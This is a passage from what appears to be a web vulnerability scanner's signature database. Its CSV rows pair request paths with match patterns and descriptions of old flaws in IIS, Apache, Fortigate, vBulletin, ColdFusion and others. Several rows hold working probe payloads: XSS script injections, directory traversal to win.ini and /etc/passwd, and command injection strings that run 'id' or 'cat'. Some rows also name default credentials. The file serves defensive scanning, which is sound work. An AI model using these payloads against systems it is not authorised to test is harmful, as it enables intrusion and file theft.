removed.\",\"\",\"\"\n\"002937\",\"CWE-552\",\"2\",\"/perl/env.pl\",\"GET\",\"BODY:HSERVER_SOFTWARE\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002938\",\"CWE-552\",\"2\",\"/perl/samples/env.pl\",\"GET\",\"BODY:HSERVER_SOFTWARE\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002939\",\"CWE-552\",\"2\",\"/perl/samples/lancgi.pl\",\"GET\",\"BODY:Lan Boards\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002940\",\"CWE-552\",\"2\",\"/perl/samples/ndslogin.pl\",\"GET\",\"BODY:Fullname\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002941\",\"CWE-552\",\"2\",\"/perl/samples/volscgi.pl\",\"GET\",\"BODY:Novell&&CODE:200\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002942\",\"CWE-552\",\"2\",\"/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse\",\"GET\",\"BODY:SERVER_SOFTWARE\",\"Novell Netware 5.1 contains Novonyx default files which reveal system information. All default files should be removed.\",\"\",\"\"\n\"002943\",\"CWE-552\",\"2\",\"/index.html.ca\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002944\",\"CWE-552\",\"2\",\"/index.html.cz.iso8859-2\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002945\",\"CWE-552\",\"2\",\"/index.html.de\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002946\",\"CWE-552\",\"2\",\"/index.html.dk\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002947\",\"CWE-552\",\"2\",\"/index.html.ee\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002948\",\"CWE-552\",\"2\",\"/index.html.el\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002949\",\"CWE-552\",\"2\",\"/index.html.en\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002950\",\"CWE-552\",\"2\",\"/index.html.es\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002951\",\"CWE-552\",\"2\",\"/index.html.et\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002952\",\"CWE-552\",\"2\",\"/index.html.fr\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002953\",\"CWE-552\",\"2\",\"/index.html.he.iso8859-8\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002954\",\"CWE-552\",\"2\",\"/index.html.hr.iso8859-2\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002955\",\"CWE-552\",\"2\",\"/index.html.it\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002956\",\"CWE-552\",\"2\",\"/index.html.ja.iso2022-jp\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002957\",\"CWE-552\",\"2\",\"/index.html.kr.iso2022-kr\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002958\",\"CWE-552\",\"2\",\"/index.html.ltz.utf8\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002959\",\"CWE-552\",\"2\",\"/index.html.lu.utf8\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002960\",\"CWE-552\",\"2\",\"/index.html.nl\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002961\",\"CWE-552\",\"2\",\"/index.html.nn\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002962\",\"CWE-552\",\"2\",\"/index.html.no\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002963\",\"CWE-552\",\"2\",\"/index.html.po.iso8859-2\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002964\",\"CWE-552\",\"2\",\"/index.html.pt\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002965\",\"CWE-552\",\"2\",\"/index.html.pt-br\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002966\",\"CWE-552\",\"2\",\"/index.html.ru.cp-1251\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002967\",\"CWE-552\",\"2\",\"/index.html.ru.cp866\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002968\",\"CWE-552\",\"2\",\"/index.html.ru.iso-ru\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002969\",\"CWE-552\",\"2\",\"/index.html.ru.koi8-r\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002970\",\"CWE-552\",\"2\",\"/index.html.ru.utf8\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002971\",\"CWE-552\",\"2\",\"/index.html.se\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002972\",\"CWE-552\",\"2\",\"/index.html.tw\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002973\",\"CWE-552\",\"2\",\"/index.html.tw.Big5\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002974\",\"CWE-552\",\"2\",\"/index.html.var\",\"GET\",\"CODE:200\",\"Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.\",\"\",\"\"\n\"002975\",\"CWE-552\",\"2\",\"/test\",\"GET\",\"BODY:test hierarchy\",\"Apache Tomcat default file found. All default files should be removed.\",\"\",\"\"\n\"002976\",\"CVE-1999-0739,MS99-013\",\"2\",\"/iissamples/issamples/codebrws.asp\",\"GET\",\"BODY:Sample ASP Search Form\",\"This is a default IIS script/file which should be removed.\",\"\",\"\"\n\"002977\",\"MS99-013\",\"2\",\"/iissamples/issamples/ixqlang.htm\",\"GET\",\"BODY:Query Language\",\"IIS default file found. All default files should be removed.\",\"\",\"\"\n\"002978\",\"CVE-1999-1451,MS99-013\",\"2\",\"/iissamples/issamples/Winmsdp.exe\",\"GET\",\"BODY:Sample ASP Search Form\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"002979\",\"CVE-1999-0739,MS99-013\",\"2\",\"/iissamples/sdk/asp/docs/codebrw2.asp\",\"GET\",\"CODE:200\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"002980\",\"CVE-1999-0739,MS99-013\",\"2\",\"/iissamples/sdk/asp/docs/codebrws.asp\",\"GET\",\"CODE:200\",\"This is a default IIS script/file that should be removed.\",\"\",\"\"\n\"002981\",\"CVE-1999-1451,MS99-013\",\"2\",\"/iissamples/sdk/asp/docs/Winmsdp.exe\",\"GET\",\"CODE:200\",\"This is a default IIS script/file that should be removed. CVE-1999-0738. MS99-013.\",\"\",\"\"\n\"002982\",\"CWE-552\",\"2\",\"/mc-icons/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.\",\"\",\"\"\n\"002983\",\"CWE-552\",\"2\",\"/ns-icons/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.\",\"\",\"\"\n\"002984\",\"CVE-2012-4431\",\"3\",\"@CGIDIRSprintenv\",\"GET\",\"BODY:DOCUMENT_ROOT\",\"Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks.\",\"\",\"\"\n\"002985\",\"CVE-2012-4431\",\"3\",\"@CGIDIRSprintenv\",\"GET\",\"BODY:Premature end of script headers: \\/\",\"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks.\",\"\",\"\"\n\"002986\",\"CWE-552\",\"3\",\"@CGIDIRStest-cgi\",\"GET\",\"BODY:PATH_TRANSLATED\",\"Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.\",\"\",\"\"\n\"002987\",\"CWE-552\",\"3\",\"@CGIDIRStest-cgi\",\"GET\",\"BODY:Premature end of script headers: \\/\",\"Apache 2.0 printenv default script does not have execute permissions but leaks file system paths.\",\"\",\"\"\n\"002988\",\"CWE-552\",\"3\",\"/pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E\",\"GET\",\"BODY:Edit Database\",\"Oracle admin page may reveal passwords in a prebuilt form and reveal database information.\",\"\",\"\"\n\"002989\",\"CWE-552\",\"3\",\"@PHPINFODIRS@PHPINFOFILES\",\"GET\",\"BODY:PHP Version\",\"PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.\",\"\",\"\"\n\"002993\",\"CWE-552\",\"b\",\"/NetDetector/middle_help_intro.htm\",\"GET\",\"BODY:NIKSUN\\-HELP\",\"The system appears to be a Niksun NetDetector (network monitoring). The help files should be available at /NetDetector/quick_help_index.html\",\"\",\"\"\n\"002994\",\"CWE-552\",\"b\",\"/a/\",\"GET\",\"CODE:200\",\"May be Kebi Web Mail administration menu.\",\"\",\"\"\n\"002995\",\"CWE-552\",\"b\",\"/basilix/\",\"GET\",\"CODE:200\",\"BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'\",\"\",\"\"\n\"002996\",\"CWE-552\",\"b\",\"/bottom.html\",\"GET\",\"BODY:Topaz Prism\",\"Topaz Prism appears to be running, try login with admin/admin.\",\"\",\"\"\n\"002997\",\"CWE-552\",\"b\",\"/interchange/\",\"GET\",\"CODE:200\",\"Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.\",\"\",\"\"\n\"002998\",\"CWE-552\",\"b\",\"/sca/menu.jsp\",\"GET\",\"BODY:Service Control Agent\",\"Entrust GetAccess Service Control Agent is installed.\",\"\",\"\"\n\"002999\",\"CWE-552\",\"b\",\"/\",\"SEARCH\",\"BODY:Length Required\",\"WebDAV is installed.\\n\",\";\",\"\"\n\"003000\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/icons/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003001\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/manual/images/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003002\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/com/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003003\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/COM/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003004\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/doc/packages/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003005\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/image/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003006\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/javax/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003007\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/perl/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003008\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/scripts/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003009\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/SUNWmc/htdocs/en_US/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory found. This is likely a Sun Solstice installation.\",\"\",\"\"\n\"003010\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/search/inc/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. This is likely Sun One Webserver 6.1 search.\",\"\",\"\"\n\"003011\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/images/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003012\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"3\",\"/docs/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003013\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"3\",\"/examples/\",\"GET\",\"BODY:Directory Listing&&BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003014\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"3\",\"/style/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003015\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"3\",\"/styles/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003016\",\"OSVDB-3280\",\"3\",\"/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\\">\\\"<script>javascript:alert(document.cookie)</script>\",\"GET\",\"BODY:<script>javascript:alert\\(document\\.cookie\\)<\\/script>\",\"Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003017\",\"CVE-2003-1211\",\"4\",\"/search.asp?Search=\\\">&lt;script&gt;alert(Vulnerable)&lt;/script&gt;\",\"GET\",\"BODY:>\\&lt;script\\&gt;alert\\(\\)\\&lt;\\/script\\&gt;\",\"Max Web Portal is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003018\",\"OSVDB-3282\",\"8\",\"/uploader.php\",\"GET\",\"CODE:200\",\"This script may allow arbitrary files to be uploaded to the remote server.\",\"\",\"\"\n\"003019\",\"CVE-1999-1451,MS99-013\",\"3\",\"/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp\",\"GET\",\"BODY:Path not found\",\"Winmsdp.exe can be used to determine if a file system path exists or not.\",\"\",\"\"\n\"003022\",\"CVE-1999-1451,MS99-013,MSKB:Q231368\",\"6\",\"/iissamples/exair/howitworks/Winmsdp.exe\",\"GET\",\"BODY:ASP Source code browser\",\"This is a default IIS script/file that should be removed. It may allow a DoS against the server.\",\"\",\"\"\n\"003023\",\"CVE-2002-1079\",\"7\",\"/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini\",\"GET\",\"@LFI()\",\"Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.\",\"\",\"\"\n\"003025\",\"CVE-2002-1081\",\"5\",\"/conspass.chl+\",\"GET\",\"CODE:200\",\"Abyss allows hidden/protected files to be served if a + is added to the request.\",\"\",\"\"\n\"003026\",\"CVE-2002-1081\",\"5\",\"/consport.chl+\",\"GET\",\"CODE:200\",\"Abyss allows hidden/protected files to be served if a + is added to the request.\",\"\",\"\"\n\"003027\",\"CVE-2002-1081\",\"5\",\"/general.chl+\",\"GET\",\"CODE:200\",\"Abyss allows hidden/protected files to be served if a + is added to the request.\",\"\",\"\"\n\"003028\",\"CVE-2002-1081\",\"5\",\"/srvstatus.chl+\",\"GET\",\"CODE:200\",\"Abyss allows hidden/protected files to be served if a + is added to the request.\",\"\",\"\"\n\"003029\",\"CVE-2002-1078\",\"3\",\"///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Abyss 1.03 reveals directory listing when multiple /'s are requested.\",\"\",\"\"\n\"003030\",\"https://securitytracker.com/id/1008158\",\"4\",\"/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003031\",\"https://securitytracker.com/id/1008158\",\"4\",\"/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003032\",\"OSVDB-3295\",\"4\",\"/antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003033\",\"OSVDB-3295\",\"4\",\"/antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003034\",\"OSVDB-3296\",\"4\",\"/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session\",\"GET\",\"BODY:><script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003035\",\"OSVDB-3296\",\"4\",\"/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\\\"><script>alert('Vulnerable')</script>,/system/status/session\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003036\",\"OSVDB-3296\",\"4\",\"/theme1/selector?button=status,monitor,session&button_url=/system/status/status\\\"><script>alert\\('Vulnerable'\\)<\\/script>,/system/status/moniter,/system/status/session\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003037\",\"OSVDB-3296\",\"4\",\"/theme1/selector?button=status,monitor,session\\\"><script>alert\\('Vulnerable'\\)<\\/script>\\&button_url\\=\\/system\\/status\\/status,\\/system\\/status\\/moniter,\\/system\\/status\\/session\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages.\",\"\",\"\"\n\"003038\",\"CVE-2003-0492\",\"4\",\"/search.asp?Search=\",\"GET\",\"BODY:>\\&lt;script\\&gt;alert\\(Vulnerable\\)\\&lt;\\/script\\&gt;\",\"Snitz 3.4.0.3 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003039\",\"CVE-2002-1660\",\"8\",\"@FORUMcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22\",\"GET\",\"BODY:uid=\",\"Vbulletin allows remote command execution.\",\"\",\"\"\n\"003040\",\"CVE-2002-1660\",\"8\",\"@VBULLETINcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22\",\"GET\",\"BODY:uid=\",\"Vbulletin allows remote command execution.\",\"\",\"\"\n\"003045\",\"CVE-2000-0709\",\"6\",\"/_vti_bin/\",\"GET\",\"BODY:shtml\\.dll&&BODY:shtml\\.exe\",\"shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).\",\"\",\"\"\n\"003047\",\"CVE-2001-0241\",\"6d\",\"/NULL.printer\",\"GET\",\"BODY:Error in web printer install\",\"Internet Printing (IPP) is enabled. Some versions have a buffer overflow/DoS in Windows 2000 that allows remote attackers to gain admin privileges via a long print request that is passed to the extension through IIS 5.0. Disabling the .printer mapping i\",\"\",\"\"\n\"003048\",\"CVE-2002-0576\",\"3\",\"/nul..cfm\",\"GET\",\"BODY:The template specification\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. KPMG-2002013. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003049\",\"CVE-2002-0576\",\"3\",\"/nul..dbm\",\"GET\",\"BODY:The template specification\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. Macromedia MPSB02-01. KPMG-2002013. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003050\",\"CVE-2002-0576\",\"3\",\"/nul.cfm\",\"GET\",\"BODY:The requested file\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. KPMG-2002013. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003051\",\"CVE-2002-0576\",\"3\",\"/nul.dbm\",\"GET\",\"BODY:The requested file\",\"ColdFusion 5.0 and below, 4.0-5.0 reveal file system paths of .cfm or .dbm files when the request contains invalid DOS devices. KPMG-2002013. http://www.macromedia.com/v1/handlers/index.cfm?ID=22906\",\"\",\"\"\n\"003053\",\"CVE-1999-0951\",\"8\",\"@CGIDIRSimagemap\",\"GET\",\"CODE:200\",\"imagemap.exe was found. Many versions from different vendors contain flaws.\",\"\",\"\"\n\"003054\",\"CVE-1999-0951\",\"8\",\"@CGIDIRSimagemap.exe\",\"GET\",\"CODE:200\",\"imagemap.exe was found. Many versions from different vendors contain flaws.\",\"\",\"\"\n\"003055\",\"CVE-2000-0122\",\"3\",\"@CGIDIRShtimage.exe/path/filename?2,2\",\"GET\",\"BODY:tried the following\",\"htimage.exe can provide physical path of web server.\",\"\",\"\"\n\"003056\",\"CVE-2000-0256\",\"d\",\"@CGIDIRShtimage.exe\",\"GET\",\"CODE:200\",\"htimage.exe may be vulnerable to a buffer overflow in the mapname portion. MS00-028.\",\"\",\"\"\n\"003057\",\"CVE-1999-0068\",\"7\",\"/mlog.html\",\"GET\",\"CODE:200\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003058\",\"CVE-1999-0068\",\"7\",\"/mlog.phtml\",\"GET\",\"CODE:200\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003059\",\"CVE-1999-0068\",\"7\",\"/mylog.html?screen=@LFI()\",\"GET\",\"@LFI()\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003060\",\"CVE-1999-0068\",\"7\",\"/mylog.phtml?screen=@LFI()\",\"GET\",\"@LFI()\",\"Remote file read vulnerability 1999-0068\",\"\",\"\"\n\"003061\",\"CVE-1999-0068\",\"7\",\"/php/mlog.html\",\"GET\",\"CODE:200\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003062\",\"CVE-1999-0068\",\"7\",\"/php/mlog.phtml\",\"GET\",\"CODE:200\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003063\",\"CVE-1999-0068\",\"7\",\"/php/mylog.html?screen=@LFI()\",\"GET\",\"@LFI()\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003064\",\"CVE-1999-0068\",\"7\",\"/php/mylog.phtml?screen=@LFI()\",\"GET\",\"@LFI()\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003065\",\"CVE-1999-0068\",\"7\",\"/fi?@LFI(abs)\",\"GET\",\"@LFI()\",\"Remote file read vulnerability 1999-0346\",\"\",\"\"\n\"003069\",\"CVE-2000-0538.\",\"d\",\"/CFIDE/administrator/index.cfm\",\"GET\",\"BODY:PasswordProvided&&BODY:cfadminPassword\",\"ColdFusion Administrator found. ColdFusion 4.5.1 and earlier may have an overflow by submitting a 40k character password.\",\"\",\"\"\n\"003070\",\"CVE-2002-0434\",\"7\",\"/directory.php?dir=%3Bcat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"Marcus S. Xenakis directory.php script allows for command execution.\",\"\",\"\"\n\"003071\",\"CVE-2002-1034,CVE-2002-1033\",\"7\",\"/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:hosts:\",\"GET\",\"@LFI()\",\"SunPS iRunbook Version 2.5.2 allows files to be read remotely.\",\"\",\"\"\n\"003072\",\"CVE-2002-1034,CVE-2002-1033\",\"7\",\"/content/base/build/explorer/none.php?@LFI(abs)\",\"GET\",\"@LFI()\",\"SunPS iRunbook Version 2.5.2 allows files to be read remotely.\",\"\",\"\"\n\"003073\",\"CVE-2002-0568\",\"3\",\"/soapConfig.xml\",\"GET\",\"CODE:200\",\"Oracle 9iAS configuration file found.\",\"\",\"\"\n\"003074\",\"CVE-2001-0320\",\"7\",\"@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"@LFI()\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version.\",\"\",\"\"\n\"003075\",\"CVE-2001-0320\",\"7\",\"@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK\",\"GET\",\"@LFI()\",\"PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version.\",\"\",\"\"\n\"003076\",\"CVE-2002-0341\",\"3\",\"@CGIDIRSGW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA\",\"GET\",\"BODY:SYS:\",\"Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI.\",\"\",\"\"\n\"003077\",\"CVE-2002-0341\",\"7\",\"/GW5/GWWEB.EXE?HELP=bad-request\",\"GET\",\"BODY:Could not find file SYS\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003078\",\"CVE-2002-0341\",\"7\",\"/GWWEB.EXE?HELP=bad-request\",\"GET\",\"BODY:Could not find file SYS\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003079\",\"CVE-2002-0341\",\"7\",\"@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request\",\"GET\",\"BODY:Could not find file SYS\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003080\",\"CVE-2002-0341\",\"7\",\"@CGIDIRSGWWEB.EXE?HELP=bad-request\",\"GET\",\"BODY:Could not find file SYS\",\"Groupwise allows system information and file retrieval by modifying arguments to the help system.\",\"\",\"\"\n\"003081\",\"CVE-2003-0624\",\"4\",\"/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example 